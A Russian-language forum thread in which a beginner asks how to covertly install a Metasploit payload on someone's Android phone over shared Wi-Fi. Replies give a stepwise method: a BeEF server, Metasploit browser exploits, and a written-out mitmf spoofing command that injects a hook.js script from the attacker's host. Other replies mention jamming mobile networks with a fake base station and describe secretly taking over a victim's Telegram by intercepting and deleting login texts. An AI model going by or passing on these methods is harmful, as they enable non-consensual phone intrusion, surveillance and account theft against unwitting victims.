Добрый день, прошу помощи новичку, если не трудно в данном вопросе. Также изучаю тему получения доступа к файловой системе Андроидов и в поиске по форуму наткнулся на здешнее сообщение, где предлагается использовать Метасплоит и получение по средствам MS шела на соответствующем телефоне, и возник вопрос, как можно установить пейлоад на целевое устройство, созданный msfvenom без вот такого явного участия собственника телефона (т.е. без явного привлечения методов социальной инженерии, или же как это сделать незаметно) в той же Wifi сети. Есть ли иной способ проникнуть на телефон?

1. Подними сервер beef

2. Подними с помощью msf какой то пассивный сплойт(под мобильные устройства), или можешь поднять несколько, и далее редиректить их с одного сервера(msf) на другой(если один не сработал то на другой итд)

3. Запусти mitmf.py -i wlan0--inject --spoof --js-url http://beef:3000/hook.js и жди...

4. Как только увидишь что подцепил браузер запускай кидай юзеру событие в браузер по клику на которое он будет перенаправлен на твои сервера msf.

ps: Надеюсь что сам ход мысли понятен, реализовать желаемое можно многими способами, в теории можно заглушить 3g/4g и на osmocom поднять свою BTS и переподключить все девайсы к ней, и далее уже с помощью соц. инженерии(и не только) пытаться реализовать задуманное.

Спасибо, а можете пояснить плез как сервера с msf развернуть, гуглил msf server, но похоже не корректно задаю вопрос. Или надо в лоб все делать т.е. для примера перенаправлять, когда юзер нажал на beef-событие из браузера, на мой апач сервис, где у меня грубо говоря написано для примера "Hello World, скачайте payload" со ссылкой на апк файл для скачивания?

Эти пункты очень интересуют

Есть вообще вероятность прочитать переписку в чужом Telegram?

Ответ на эти пункты должен включать полное объяснение как пользоваться данными инструментами. Наберите в гугле просто 'metasploit how to hack browser' и я вам даю гарантию в 99% что там будет информация.

юзер кликнул на красивое окошло которое у него всплыло, и автоматом отправился на ваш msf сервер, в результате чего в него был загружен и выполнен payload(какой уже решать вам) и вы получили на своей стороне сессию. Далее эту схему уже можно автоматизировать и улучшать....

я делал так, отвлекал жертву чтоб она была занята далеко от телефона, с ее номера заходил в веб версию телеги, подтверждал вход с ее телефона, смс с подтвержденями удалял, вуаля - есть доступ

Без доступа к гаджету это ничего не получится